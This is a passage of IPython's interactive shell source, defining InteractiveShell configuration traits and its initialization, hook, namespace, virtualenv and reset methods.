to user input before code is run.
"""
).tag(config=True)
autocall = Enum((0,1,2), default_value=0, help=
"""
Make IPython automatically call any callable object even if you didn't
type explicit parentheses. For example, 'str 43' becomes 'str(43)'
automatically. The value can be '0' to disable the feature, '1' for
'smart' autocall, where it is not applied if there are no more
arguments on the line, and '2' for 'full' autocall, where all callable
objects are automatically called (even if no arguments are present).
"""
).tag(config=True)
autoindent = Bool(True, help=
"""
Autoindent IPython code entered interactively.
"""
).tag(config=True)
autoawait = Bool(True, help=
"""
Automatically run await statement in the top level repl.
"""
).tag(config=True)
loop_runner_map ={
'asyncio':(_asyncio_runner, True),
'curio':(_curio_runner, True),
'trio':(_trio_runner, True),
'sync': (_pseudo_sync_runner, False)
}
loop_runner = Any(default_value="IPython.core.interactiveshell._asyncio_runner",
allow_none=True,
help="""Select the loop runner that will be used to execute top-level asynchronous code"""
).tag(config=True)
@default('loop_runner')
def _default_loop_runner(self):
return import_item("IPython.core.interactiveshell._asyncio_runner")
@validate('loop_runner')
def _import_runner(self, proposal):
if isinstance(proposal.value, str):
if proposal.value in self.loop_runner_map:
runner, autoawait = self.loop_runner_map[proposal.value]
self.autoawait = autoawait
return runner
runner = import_item(proposal.value)
if not callable(runner):
raise ValueError('loop_runner must be callable')
return runner
if not callable(proposal.value):
raise ValueError('loop_runner must be callable')
return proposal.value
automagic = Bool(True, help=
"""
Enable magic commands to be called without the leading %.
"""
).tag(config=True)
banner1 = Unicode(default_banner,
help="""The part of the banner to be printed before the profile"""
).tag(config=True)
banner2 = Unicode('',
help="""The part of the banner to be printed after the profile"""
).tag(config=True)
cache_size = Integer(1000, help=
"""
Set the size of the output cache. The default is 1000, you can
change it permanently in your config file. Setting it to 0 completely
disables the caching system, and the minimum value accepted is 3 (if
you provide a value less than 3, it is reset to 0 and a warning is
issued). This limit is defined because otherwise you'll spend more
time re-flushing a too small cache than working
"""
).tag(config=True)
color_info = Bool(True, help=
"""
Use colors for displaying information about objects. Because this
information is passed through a pager (like 'less'), and some pagers
get confused with color codes, this capability can be turned off.
"""
).tag(config=True)
colors = CaselessStrEnum(('Neutral', 'NoColor','LightBG','Linux'),
default_value='Neutral',
help="Set the color scheme (NoColor, Neutral, Linux, or LightBG)."
).tag(config=True)
debug = Bool(False).tag(config=True)
disable_failing_post_execute = Bool(False,
help="Don't call post-execute functions that have failed in the past."
).tag(config=True)
display_formatter = Instance(DisplayFormatter, allow_none=True)
displayhook_class = Type(DisplayHook)
display_pub_class = Type(DisplayPublisher)
compiler_class = Type(CachingCompiler)
sphinxify_docstring = Bool(False, help=
"""
Enables rich html representation of docstrings. (This requires the
docrepr module).
""").tag(config=True)
@observe("sphinxify_docstring")
def _sphinxify_docstring_changed(self, change):
if change['new']:
warn("`sphinxify_docstring` is provisional since IPython 5.0 and might change in future versions." , ProvisionalWarning)
enable_html_pager = Bool(False, help=
"""
(Provisional API) enables html representation in mime bundles sent
to pagers.
""").tag(config=True)
@observe("enable_html_pager")
def _enable_html_pager_changed(self, change):
if change['new']:
warn("`enable_html_pager` is provisional since IPython 5.0 and might change in future versions.", ProvisionalWarning)
data_pub_class = None
exit_now = Bool(False)
exiter = Instance(ExitAutocall)
@default('exiter')
def _exiter_default(self):
return ExitAutocall(self)
# Monotonically increasing execution counter
execution_count = Integer(1)
filename = Unicode("<ipython console>")
ipython_dir= Unicode('').tag(config=True) # Set to get_ipython_dir() in __init__
# Used to transform cells before running them, and check whether code is complete
input_transformer_manager = Instance('IPython.core.inputtransformer2.TransformerManager',
())
@property
def input_transformers_cleanup(self):
return self.input_transformer_manager.cleanup_transforms
input_transformers_post = List([],
help="A list of string input transformers, to be applied after IPython's "
"own input transformations."
)
@property
def input_splitter(self):
"""Make this available for backward compatibility (pre-7.0 release) with existing code.
For example, ipykernel ipykernel currently uses
`shell.input_splitter.check_complete`
"""
from warnings import warn
warn("`input_splitter` is deprecated since IPython 7.0, prefer `input_transformer_manager`.",
DeprecationWarning, stacklevel=2
)
return self.input_transformer_manager
logstart = Bool(False, help=
"""
Start logging to the default log file in overwrite mode.
Use `logappend` to specify a log file to **append** logs to.
"""
).tag(config=True)
logfile = Unicode('', help=
"""
The name of the logfile to use.
"""
).tag(config=True)
logappend = Unicode('', help=
"""
Start logging to the given file in append mode.
Use `logfile` to specify a log file to **overwrite** logs to.
"""
).tag(config=True)
object_info_string_level = Enum((0,1,2), default_value=0,
).tag(config=True)
pdb = Bool(False, help=
"""
Automatically call the pdb debugger after every exception.
"""
).tag(config=True)
display_page = Bool(False,
help="""If True, anything that would be passed to the pager
will be displayed as regular output instead."""
).tag(config=True)
# deprecated prompt traits:
prompt_in1 = Unicode('In [\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_in2 = Unicode(' .\\D.: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_out = Unicode('Out[\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompts_pad_left = Bool(True,
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
@observe('prompt_in1', 'prompt_in2', 'prompt_out', 'prompt_pad_left')
def _prompt_trait_changed(self, change):
name = change['name']
warn("InteractiveShell.{name} is deprecated since IPython 4.0"
" and ignored since 5.0, set TerminalInteractiveShell.prompts"
" object directly.".format(name=name))
# protect against weird cases where self.config may not exist:
show_rewritten_input = Bool(True,
help="Show rewritten input, e.g. for autocall."
).tag(config=True)
quiet = Bool(False).tag(config=True)
history_length = Integer(10000,
help='Total length of command history'
).tag(config=True)
history_load_length = Integer(1000, help=
"""
The number of saved history entries to be loaded
into the history buffer at startup.
"""
).tag(config=True)
ast_node_interactivity = Enum(['all', 'last', 'last_expr', 'none', 'last_expr_or_assign'],
default_value='last_expr',
help="""
'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying
which nodes should be run interactively (displaying output from expressions).
"""
).tag(config=True)
# TODO: this part of prompt management should be moved to the frontends.
# Use custom TraitTypes that convert '0'->'' and '\\n'->'\n'
separate_in = SeparateUnicode('\n').tag(config=True)
separate_out = SeparateUnicode('').tag(config=True)
separate_out2 = SeparateUnicode('').tag(config=True)
wildcards_case_sensitive = Bool(True).tag(config=True)
xmode = CaselessStrEnum(('Context', 'Plain', 'Verbose', 'Minimal'),
default_value='Context',
help="Switch modes for the IPython exception handlers."
).tag(config=True)
# Subcomponents of InteractiveShell
alias_manager = Instance('IPython.core.alias.AliasManager', allow_none=True)
prefilter_manager = Instance('IPython.core.prefilter.PrefilterManager', allow_none=True)
builtin_trap = Instance('IPython.core.builtin_trap.BuiltinTrap', allow_none=True)
display_trap = Instance('IPython.core.display_trap.DisplayTrap', allow_none=True)
extension_manager = Instance('IPython.core.extensions.ExtensionManager', allow_none=True)
payload_manager = Instance('IPython.core.payload.PayloadManager', allow_none=True)
history_manager = Instance('IPython.core.history.HistoryAccessorBase', allow_none=True)
magics_manager = Instance('IPython.core.magic.MagicsManager', allow_none=True)
profile_dir = Instance('IPython.core.application.ProfileDir', allow_none=True)
@property
def profile(self):
if self.profile_dir is not None:
name = os.path.basename(self.profile_dir.location)
return name.replace('profile_','')
# Private interface
_post_execute = Dict()
# Tracks any GUI loop loaded for pylab
pylab_gui_select = None
last_execution_succeeded = Bool(True, help='Did last executed command succeeded')
last_execution_result = Instance('IPython.core.interactiveshell.ExecutionResult', help='Result of executing the last command', allow_none=True)
def __init__(self, ipython_dir=None, profile_dir=None,
user_module=None, user_ns=None,
custom_exceptions=((), None), **kwargs):
# This is where traits with a config_key argument are updated
# from the values on config.
super(InteractiveShell, self).__init__(**kwargs)
if 'PromptManager' in self.config:
warn('As of IPython 5.0 `PromptManager` config will have no effect'
' and has been replaced by TerminalInteractiveShell.prompts_class')
self.configurables = [self]
# These are relatively independent and stateless
self.init_ipython_dir(ipython_dir)
self.init_profile_dir(profile_dir)
self.init_instance_attrs()
self.init_environment()
# Check if we're in a virtualenv, and set up sys.path.
self.init_virtualenv()
# Create namespaces (user_ns, user_global_ns, etc.)
self.init_create_namespaces(user_module, user_ns)
# This has to be done after init_create_namespaces because it uses
# something in self.user_ns, but before init_sys_modules, which
# is the first thing to modify sys.
# TODO: When we override sys.stdout and sys.stderr before this class
# is created, we are saving the overridden ones here. Not sure if this
# is what we want to do.
self.save_sys_module_state()
self.init_sys_modules()
# While we're trying to have each part of the code directly access what
# it needs without keeping redundant references to objects, we have too
# much legacy code that expects ip.db to exist.
self.db = PickleShareDB(os.path.join(self.profile_dir.location, 'db'))
self.init_history()
self.init_encoding()
self.init_prefilter()
self.init_syntax_highlighting()
self.init_hooks()
self.init_events()
self.init_pushd_popd_magic()
self.init_user_ns()
self.init_logger()
self.init_builtins()
# The following was in post_config_initialization
self.init_inspector()
self.raw_input_original = input
self.init_completer()
# TODO: init_io() needs to happen before init_traceback handlers
# because the traceback handlers hardcode the stdout/stderr streams.
# This logic in in debugger.Pdb and should eventually be changed.
self.init_io()
self.init_traceback_handlers(custom_exceptions)
self.init_prompts()
self.init_display_formatter()
self.init_display_pub()
self.init_data_pub()
self.init_displayhook()
self.init_magics()
self.init_alias()
self.init_logstart()
self.init_pdb()
self.init_extension_manager()
self.init_payload()
self.init_deprecation_warnings()
self.hooks.late_startup_hook()
self.events.trigger('shell_initialized', self)
atexit.register(self.atexit_operations)
# The trio runner is used for running Trio in the foreground thread. It
# is different from `_trio_runner(async_fn)` in `async_helpers.py`
# which calls `trio.run()` for every cell. This runner runs all cells
# inside a single Trio event loop. If used, it is set from
# `ipykernel.kernelapp`.
self.trio_runner = None
def get_ipython(self):
"""Return the currently running IPython instance."""
return self
#-------------------------------------------------------------------------
# Trait changed handlers
#-------------------------------------------------------------------------
@observe('ipython_dir')
def _ipython_dir_changed(self, change):
ensure_dir_exists(change['new'])
def set_autoindent(self,value=None):
"""Set the autoindent flag.
If called with no arguments, it acts as a toggle."""
if value is None:
self.autoindent = not self.autoindent
else:
self.autoindent = value
def set_trio_runner(self, tr):
self.trio_runner = tr
#-------------------------------------------------------------------------
# init_* methods called by __init__
#-------------------------------------------------------------------------
def init_ipython_dir(self, ipython_dir):
if ipython_dir is not None:
self.ipython_dir = ipython_dir
return
self.ipython_dir = get_ipython_dir()
def init_profile_dir(self, profile_dir):
if profile_dir is not None:
self.profile_dir = profile_dir
return
self.profile_dir = ProfileDir.create_profile_dir_by_name(
self.ipython_dir, "default"
)
def init_instance_attrs(self):
self.more = False
# command compiler
self.compile = self.compiler_class()
# Make an empty namespace, which extension writers can rely on both
# existing and NEVER being used by ipython itself. This gives them a
# convenient location for storing additional information and state
# their extensions may require, without fear of collisions with other
# ipython names that may develop later.
self.meta = Struct()
# Temporary files used for various purposes. Deleted at exit.
self.tempfiles = []
self.tempdirs = []
# keep track of where we started running (mainly for crash post-mortem)
# This is not being used anywhere currently.
self.starting_dir = os.getcwd()
# Indentation management
self.indent_current_nsp = 0
# Dict to track post-execution functions that have been registered
self._post_execute = {}
def init_environment(self):
"""Any changes we need to make to the user's environment."""
pass
def init_encoding(self):
# Get system encoding at startup time. Certain terminals (like Emacs
# under Win32 have it set to None, and we need to have a known valid
# encoding to use in the raw_input() method
try:
self.stdin_encoding = sys.stdin.encoding or 'ascii'
except AttributeError:
self.stdin_encoding = 'ascii'
@observe('colors')
def init_syntax_highlighting(self, changes=None):
# Python source parser/formatter for syntax highlighting
pyformat = PyColorize.Parser(style=self.colors, parent=self).format
self.pycolorize = lambda src: pyformat(src,'str')
def refresh_style(self):
# No-op here, used in subclass
pass
def init_pushd_popd_magic(self):
# for pushd/popd management
self.home_dir = get_home_dir()
self.dir_stack = []
def init_logger(self):
self.logger = Logger(self.home_dir, logfname='ipython_log.py',
logmode='rotate')
def init_logstart(self):
"""Initialize logging in case it was requested at the command line.
"""
if self.logappend:
self.magic('logstart %s append' % self.logappend)
elif self.logfile:
self.magic('logstart %s' % self.logfile)
elif self.logstart:
self.magic('logstart')
def init_deprecation_warnings(self):
"""
register default filter for deprecation warning.
This will allow deprecation warning of function used interactively to show
warning to users, and still hide deprecation warning from libraries import.
"""
if sys.version_info < (3,7):
warnings.filterwarnings("default", category=DeprecationWarning, module=self.user_ns.get("__name__"))
def init_builtins(self):
# A single, static flag that we set to True. Its presence indicates
# that an IPython shell has been created, and we make no attempts at
# removing on exit or representing the existence of more than one
# IPython at a time.
builtin_mod.__dict__['__IPYTHON__'] = True
builtin_mod.__dict__['display'] = display
self.builtin_trap = BuiltinTrap(shell=self)
@observe('colors')
def init_inspector(self, changes=None):
# Object inspector
self.inspector = oinspect.Inspector(oinspect.InspectColors,
PyColorize.ANSICodeColors,
self.colors,
self.object_info_string_level)
def init_io(self):
# This will just use sys.stdout and sys.stderr. If you want to
# override sys.stdout and sys.stderr themselves, you need to do that
# *before* instantiating this class, because io holds onto
# references to the underlying streams.
# io.std* are deprecated, but don't show our own deprecation warnings
# during initialization of the deprecated API.
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
io.stdout = io.IOStream(sys.stdout)
io.stderr = io.IOStream(sys.stderr)
def init_prompts(self):
# Set system prompts, so that scripts can decide if they are running
# interactively.
sys.ps1 = 'In : '
sys.ps2 = '...: '
sys.ps3 = 'Out: '
def init_display_formatter(self):
self.display_formatter = DisplayFormatter(parent=self)
self.configurables.append(self.display_formatter)
def init_display_pub(self):
self.display_pub = self.display_pub_class(parent=self, shell=self)
self.configurables.append(self.display_pub)
def init_data_pub(self):
if not self.data_pub_class:
self.data_pub = None
return
self.data_pub = self.data_pub_class(parent=self)
self.configurables.append(self.data_pub)
def init_displayhook(self):
# Initialize displayhook, set in/out prompts and printing system
self.displayhook = self.displayhook_class(
parent=self,
shell=self,
cache_size=self.cache_size,
)
self.configurables.append(self.displayhook)
# This is a context manager that installs/revmoes the displayhook at
# the appropriate time.
self.display_trap = DisplayTrap(hook=self.displayhook)
def init_virtualenv(self):
"""Add a virtualenv to sys.path so the user can import modules from it.
This isn't perfect: it doesn't use the Python interpreter with which the
virtualenv was built, and it ignores the --no-site-packages option. A
warning will appear suggesting the user installs IPython in the
virtualenv, but for many cases, it probably works well enough.
Adapted from code snippets online.
http://blog.ufsoft.org/2009/1/29/ipython-and-virtualenv
"""
if 'VIRTUAL_ENV' not in os.environ:
# Not in a virtualenv
return
p = os.path.normcase(sys.executable)
p_venv = os.path.normcase(os.environ['VIRTUAL_ENV'])
# executable path should end like /bin/python or \\scripts\\python.exe
p_exe_up2 = os.path.dirname(os.path.dirname(p))
if p_exe_up2 and os.path.exists(p_venv) and os.path.samefile(p_exe_up2, p_venv):
# Our exe is inside the virtualenv, don't need to do anything.
return
# fallback venv detection:
# stdlib venv may symlink sys.executable, so we can't use realpath.
# but others can symlink *to* the venv Python, so we can't just use sys.executable.
# So we just check every item in the symlink tree (generally <= 3)
paths = [p]
while os.path.islink(p):
p = os.path.normcase(os.path.join(os.path.dirname(p), os.readlink(p)))
paths.append(p)
# In Cygwin paths like "c:\..." and '\cygdrive\c\...' are possible
if p_venv.startswith('\\cygdrive'):
p_venv = p_venv[11:]
elif len(p_venv) >= 2 and p_venv[1] == ':':
p_venv = p_venv[2:]
if any(p_venv in p for p in paths):
# Running properly in the virtualenv, don't need to do anything
return
warn("Attempting to work in a virtualenv. If you encounter problems, please "
"install IPython inside the virtualenv.")
if sys.platform == "win32":
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'Lib', 'site-packages')
else:
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'lib',
'python%d.%d' % sys.version_info[:2], 'site-packages')
import site
sys.path.insert(0, virtual_env)
site.addsitedir(virtual_env)
#-------------------------------------------------------------------------
# Things related to injections into the sys module
#-------------------------------------------------------------------------
def save_sys_module_state(self):
"""Save the state of hooks in the sys module.
This has to be called after self.user_module is created.
"""
self._orig_sys_module_state = {'stdin': sys.stdin,
'stdout': sys.stdout,
'stderr': sys.stderr,
'excepthook': sys.excepthook}
self._orig_sys_modules_main_name = self.user_module.__name__
self._orig_sys_modules_main_mod = sys.modules.get(self.user_module.__name__)
def restore_sys_module_state(self):
"""Restore the state of the sys module."""
try:
for k, v in self._orig_sys_module_state.items():
setattr(sys, k, v)
except AttributeError:
pass
# Reset what what done in self.init_sys_modules
if self._orig_sys_modules_main_mod is not None:
sys.modules[self._orig_sys_modules_main_name] = self._orig_sys_modules_main_mod
#-------------------------------------------------------------------------
# Things related to the banner
#-------------------------------------------------------------------------
@property
def banner(self):
banner = self.banner1
if self.profile and self.profile != 'default':
banner += '\nIPython profile: %s\n' % self.profile
if self.banner2:
banner += '\n' + self.banner2
return banner
def show_banner(self, banner=None):
if banner is None:
banner = self.banner
sys.stdout.write(banner)
#-------------------------------------------------------------------------
# Things related to hooks
#-------------------------------------------------------------------------
def init_hooks(self):
# hooks holds pointers used for user-side customizations
self.hooks = Struct()
self.strdispatchers = {}
# Set all default hooks, defined in the IPython.hooks module.
hooks = IPython.core.hooks
for hook_name in hooks.__all__:
# default hooks have priority 100, i.e. low; user hooks should have
# 0-100 priority
self.set_hook(hook_name,getattr(hooks,hook_name), 100, _warn_deprecated=False)
if self.display_page:
self.set_hook('show_in_pager', page.as_hook(page.display_page), 90)
def set_hook(self,name,hook, priority=50, str_key=None, re_key=None,
_warn_deprecated=True):
"""set_hook(name,hook) -> sets an internal IPython hook.
IPython exposes some of its internal API as user-modifiable hooks. By
adding your function to one of these hooks, you can modify IPython's
behavior to call at runtime your own routines."""
# At some point in the future, this should validate the hook before it
# accepts it. Probably at least check that the hook takes the number
# of args it's supposed to.
f = types.MethodType(hook,self)
# check if the hook is for strdispatcher first
if str_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_s(str_key, f, priority )
self.strdispatchers[name] = sdp
return
if re_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_re(re.compile(re_key), f, priority )
self.strdispatchers[name] = sdp
return
dp = getattr(self.hooks, name, None)
if name not in IPython.core.hooks.__all__:
print("Warning! Hook '%s' is not one of %s" % \
(name, IPython.core.hooks.__all__ ))
if _warn_deprecated and (name in IPython.core.hooks.deprecated):
alternative = IPython.core.hooks.deprecated[name]
warn("Hook {} is deprecated. Use {} instead.".format(name, alternative), stacklevel=2)
if not dp:
dp = IPython.core.hooks.CommandChainDispatcher()
try:
dp.add(f,priority)
except AttributeError:
# it was not commandchain, plain old func - replace
dp = f
setattr(self.hooks,name, dp)
#-------------------------------------------------------------------------
# Things related to events
#-------------------------------------------------------------------------
def init_events(self):
self.events = EventManager(self, available_events)
self.events.register("pre_execute", self._clear_warning_registry)
def register_post_execute(self, func):
"""DEPRECATED: Use ip.events.register('post_run_cell', func)
Register a function for calling after code execution.
"""
warn("ip.register_post_execute is deprecated, use "
"ip.events.register('post_run_cell', func) instead.", stacklevel=2)
self.events.register('post_run_cell', func)
def _clear_warning_registry(self):
# clear the warning registry, so that different code blocks with
# overlapping line number ranges don't cause spurious suppression of
# warnings (see gh-6611 for details)
if "__warningregistry__" in self.user_global_ns:
del self.user_global_ns["__warningregistry__"]
#-------------------------------------------------------------------------
# Things related to the "main" module
#-------------------------------------------------------------------------
def new_main_mod(self, filename, modname):
"""Return a new 'main' module object for user code execution.
``filename`` should be the path of the script which will be run in the
module. Requests with the same filename will get the same module, with
its namespace cleared.
``modname`` should be the module name - normally either '__main__' or
the basename of the file without the extension.
When scripts are executed via %run, we must keep a reference to their
__main__ module around so that Python doesn't
clear it, rendering references to module globals useless.
This method keeps said reference in a private dict, keyed by the
absolute path of the script. This way, for multiple executions of the
same script we only keep one copy of the namespace (the last one),
thus preventing memory leaks from old references while allowing the
objects from the last execution to be accessible.
"""
filename = os.path.abspath(filename)
try:
main_mod = self._main_mod_cache[filename]
except KeyError:
main_mod = self._main_mod_cache[filename] = types.ModuleType(
modname,
doc="Module created for script run in IPython")
else:
main_mod.__dict__.clear()
main_mod.__name__ = modname
main_mod.__file__ = filename
# It seems pydoc (and perhaps others) needs any module instance to
# implement a __nonzero__ method
main_mod.__nonzero__ = lambda : True
return main_mod
def clear_main_mod_cache(self):
"""Clear the cache of main modules.
Mainly for use by utilities like %reset.
Examples
--------
In [15]: import IPython
In [16]: m = _ip.new_main_mod(IPython.__file__, 'IPython')
In [17]: len(_ip._main_mod_cache) > 0
Out[17]: True
In [18]: _ip.clear_main_mod_cache()
In [19]: len(_ip._main_mod_cache) == 0
Out[19]: True
"""
self._main_mod_cache.clear()
#-------------------------------------------------------------------------
# Things related to debugging
#-------------------------------------------------------------------------
def init_pdb(self):
# Set calling of pdb on exceptions
# self.call_pdb is a property
self.call_pdb = self.pdb
def _get_call_pdb(self):
return self._call_pdb
def _set_call_pdb(self,val):
if val not in (0,1,False,True):
raise ValueError('new call_pdb value must be boolean')
# store value in instance
self._call_pdb = val
# notify the actual exception handlers
self.InteractiveTB.call_pdb = val
call_pdb = property(_get_call_pdb,_set_call_pdb,None,
'Control auto-activation of pdb at exceptions')
def debugger(self,force=False):
"""Call the pdb debugger.
Keywords:
- force(False): by default, this routine checks the instance call_pdb
flag and does not actually invoke the debugger if the flag is false.
The 'force' option forces the debugger to activate even if the flag
is false.
"""
if not (force or self.call_pdb):
return
if not hasattr(sys,'last_traceback'):
error('No traceback has been produced, nothing to debug.')
return
self.InteractiveTB.debugger(force=True)
#-------------------------------------------------------------------------
# Things related to IPython's various namespaces
#-------------------------------------------------------------------------
default_user_namespaces = True
def init_create_namespaces(self, user_module=None, user_ns=None):
# Create the namespace where the user will operate. user_ns is
# normally the only one used, and it is passed to the exec calls as
# the locals argument. But we do carry a user_global_ns namespace
# given as the exec 'globals' argument, This is useful in embedding
# situations where the ipython shell opens in a context where the
# distinction between locals and globals is meaningful. For
# non-embedded contexts, it is just the same object as the user_ns dict.
# FIXME. For some strange reason, __builtins__ is showing up at user
# level as a dict instead of a module. This is a manual fix, but I
# should really track down where the problem is coming from. Alex
# Schmolck reported this problem first.
# A useful post by Alex Martelli on this topic:
# Re: inconsistent value from __builtins__
# Von: Alex Martelli <aleaxit@yahoo.com>
# Datum: Freitag 01 Oktober 2004 04:45:34 nachmittags/abends
# Gruppen: comp.lang.python
# Michael Hohn <hohn@hooknose.lbl.gov> wrote:
# > >>> print type(builtin_check.get_global_binding('__builtins__'))
# > <type 'dict'>
# > >>> print type(__builtins__)
# > <type 'module'>
# > Is this difference in return value intentional?
# Well, it's documented that '__builtins__' can be either a dictionary
# or a module, and it's been that way for a long time. Whether it's
# intentional (or sensible), I don't know. In any case, the idea is
# that if you need to access the built-in namespace directly, you
# should start with "import __builtin__" (note, no 's') which will
# definitely give you a module. Yeah, it's somewhat confusing:-(.
# These routines return a properly built module and dict as needed by
# the rest of the code, and can also be used by extension writers to
# generate properly initialized namespaces.
if (user_ns is not None) or (user_module is not None):
self.default_user_namespaces = False
self.user_module, self.user_ns = self.prepare_user_module(user_module, user_ns)
# A record of hidden variables we have added to the user namespace, so
# we can list later only variables defined in actual interactive use.
self.user_ns_hidden = {}
# Now that FakeModule produces a real module, we've run into a nasty
# problem: after script execution (via %run), the module where the user
# code ran is deleted. Now that this object is a true module (needed
# so doctest and other tools work correctly), the Python module
# teardown mechanism runs over it, and sets to None every variable
# present in that module. Top-level references to objects from the
# script survive, because the user_ns is updated with them. However,
# calling functions defined in the script that use other things from
# the script will fail, because the function's closure had references
# to the original objects, which are now all None. So we must protect
# these modules from deletion by keeping a cache.
#
# To avoid keeping stale modules around (we only need the one from the
# last run), we use a dict keyed with the full path to the script, so
# only the last version of the module is held in the cache. Note,
# however, that we must cache the module *namespace contents* (their
# __dict__). Because if we try to cache the actual modules, old ones
# (uncached) could be destroyed while still holding references (such as
# those held by GUI objects that tend to be long-lived)>
#
# The %reset command will flush this cache. See the cache_main_mod()
# and clear_main_mod_cache() methods for details on use.
# This is the cache used for 'main' namespaces
self._main_mod_cache = {}
# A table holding all the namespaces IPython deals with, so that
# introspection facilities can search easily.
self.ns_table = {'user_global':self.user_module.__dict__,
'user_local':self.user_ns,
'builtin':builtin_mod.__dict__
}
@property
def user_global_ns(self):
return self.user_module.__dict__
def prepare_user_module(self, user_module=None, user_ns=None):
"""Prepare the module and namespace in which user code will be run.
When IPython is started normally, both parameters are None: a new module
is created automatically, and its __dict__ used as the namespace.
If only user_module is provided, its __dict__ is used as the namespace.
If only user_ns is provided, a dummy module is created, and user_ns
becomes the global namespace. If both are provided (as they may be
when embedding), user_ns is the local namespace, and user_module
provides the global namespace.
Parameters
----------
user_module : module, optional
The current user module in which IPython is being run. If None,
a clean module will be created.
user_ns : dict, optional
A namespace in which to run interactive commands.
Returns
-------
A tuple of user_module and user_ns, each properly initialised.
"""
if user_module is None and user_ns is not None:
user_ns.setdefault("__name__", "__main__")
user_module = DummyMod()
user_module.__dict__ = user_ns
if user_module is None:
user_module = types.ModuleType("__main__",
doc="Automatically created module for IPython interactive environment")
# We must ensure that __builtin__ (without the final 's') is always
# available and pointing to the __builtin__ *module*. For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
user_module.__dict__.setdefault('__builtin__', builtin_mod)
user_module.__dict__.setdefault('__builtins__', builtin_mod)
if user_ns is None:
user_ns = user_module.__dict__
return user_module, user_ns
def init_sys_modules(self):
# We need to insert into sys.modules something that looks like a
# module but which accesses the IPython namespace, for shelve and
# pickle to work interactively. Normally they rely on getting
# everything out of __main__, but for embedding purposes each IPython
# instance has its own private namespace, so we can't go shoving
# everything into __main__.
# note, however, that we should only do this for non-embedded
# ipythons, which really mimic the __main__.__dict__ with their own
# namespace. Embedded instances, on the other hand, should not do
# this because they need to manage the user local/global namespaces
# only, but they live within a 'normal' __main__ (meaning, they
# shouldn't overtake the execution environment of the script they're
# embedded in).
# This is overridden in the InteractiveShellEmbed subclass to a no-op.
main_name = self.user_module.__name__
sys.modules[main_name] = self.user_module
def init_user_ns(self):
"""Initialize all user-visible namespaces to their minimum defaults.
Certain history lists are also initialized here, as they effectively
act as user namespaces.
Notes
-----
All data structures here are only filled in, they are NOT reset by this
method. If they were not empty before, data will simply be added to
them.
"""
# This function works in two parts: first we put a few things in
# user_ns, and we sync that contents into user_ns_hidden so that these
# initial variables aren't shown by %who. After the sync, we add the
# rest of what we *do* want the user to see with %who even on a new
# session (probably nothing, so they really only see their own stuff)
# The user dict must *always* have a __builtin__ reference to the
# Python standard __builtin__ namespace, which must be imported.
# This is so that certain operations in prompt evaluation can be
# reliably executed with builtins. Note that we can NOT use
# __builtins__ (note the 's'), because that can either be a dict or a
# module, and can even mutate at runtime, depending on the context
# (Python makes no guarantees on it). In contrast, __builtin__ is
# always a module object, though it must be explicitly imported.
# For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
ns = {}
# make global variables for user access to the histories
ns['_ih'] = self.history_manager.input_hist_parsed
ns['_oh'] = self.history_manager.output_hist
ns['_dh'] = self.history_manager.dir_hist
# user aliases to input and output histories. These shouldn't show up
# in %who, as they can have very large reprs.
ns['In'] = self.history_manager.input_hist_parsed
ns['Out'] = self.history_manager.output_hist
# Store myself as the public api!!!
ns['get_ipython'] = self.get_ipython
ns['exit'] = self.exiter
ns['quit'] = self.exiter
# Sync what we've added so far to user_ns_hidden so these aren't seen
# by %who
self.user_ns_hidden.update(ns)
# Anything put into ns now would show up in %who. Think twice before
# putting anything here, as we really want %who to show the user their
# stuff, not our variables.
# Finally, update the real user's namespace
self.user_ns.update(ns)
@property
def all_ns_refs(self):
"""Get a list of references to all the namespace dictionaries in which
IPython might store a user-created object.
Note that this does not include the displayhook, which also caches
objects from the output."""
return [self.user_ns, self.user_global_ns, self.user_ns_hidden] + \
[m.__dict__ for m in self._main_mod_cache.values()]
def reset(self, new_session=True, aggressive=False):
"""Clear all internal namespaces, and attempt to release references to
user objects.
If new_session is True, a new history session will be opened.
"""
# Clear histories
self.history_manager.reset(new_session)
# Reset counter used to index all histories
if new_session:
self.execution_count = 1
# Reset last execution result
self.last_execution_succeeded = True
self.last_execution_result = None
# Flush cached output items
if self.displayhook.do_full_cache:
self.displayhook.flush()
# The main execution namespaces must be cleared very carefully,
# skipping the deletion of the builtin-related keys, because doing so
# would cause errors in many object's __del__ methods.
if self.user_ns is not self.user_global_ns:
self.user_ns.clear()
ns = self.user_global_ns
drop_keys = set(ns.keys())
drop_keys.discard('__builtin__')
drop_keys.discard('__builtins__')
drop_keys.discard('__name__')
for k in drop_keys:
del ns[k]
self.user_ns_hidden.clear()
# Restore the user namespaces to minimal usability
self.init_user_ns()
if aggressive and not hasattr(self, "_sys_modules_keys"):
print("Cannot restore sys.module, no snapshot")
elif aggressive:
print("culling sys module...")
current_keys = set(sys.modules.keys())
for k in current_keys - self._sys_modules_keys:
if k.startswith("multiprocessing"):
continue
del sys.modules[k]
# Restore the default and user aliases
self.alias_manager.clear_aliases()
self.alias_manager.init_aliases()
# Now define aliases that only make sense on the terminal, because they
# need direct access to the console in a way that we can't emulate in
# GUI or web frontend
if os.name == 'posix':
for cmd in ('clear', 'more', 'less', 'man'):
if cmd not in self.magics_manager.magics['line']:
self.alias_manager.soft_define_alias(cmd, cmd)
# Flush the private list of module references kept for script
# execution protection
self.clear_main_mod_cache()
def del_var(self, varname, by_name=False):
"""Delete a variable from the various namespaces, so that, as
far as possible, we're not keeping any hidden references to it.
Parameters
----------
varname : str
The name of the variable to delete.
by_name : bool
If True, delete variables with the given name in each
namespace. If False (default), find the variable in the user
namespace, and delete references to it.
"""
if varname in ('__builtin__', '__builtins__'):
raise ValueError("Refusing to delete %s" % varname)
ns_refs = self.all_ns_refs
if by_name: # Delete by name
for ns in ns_refs:
try:
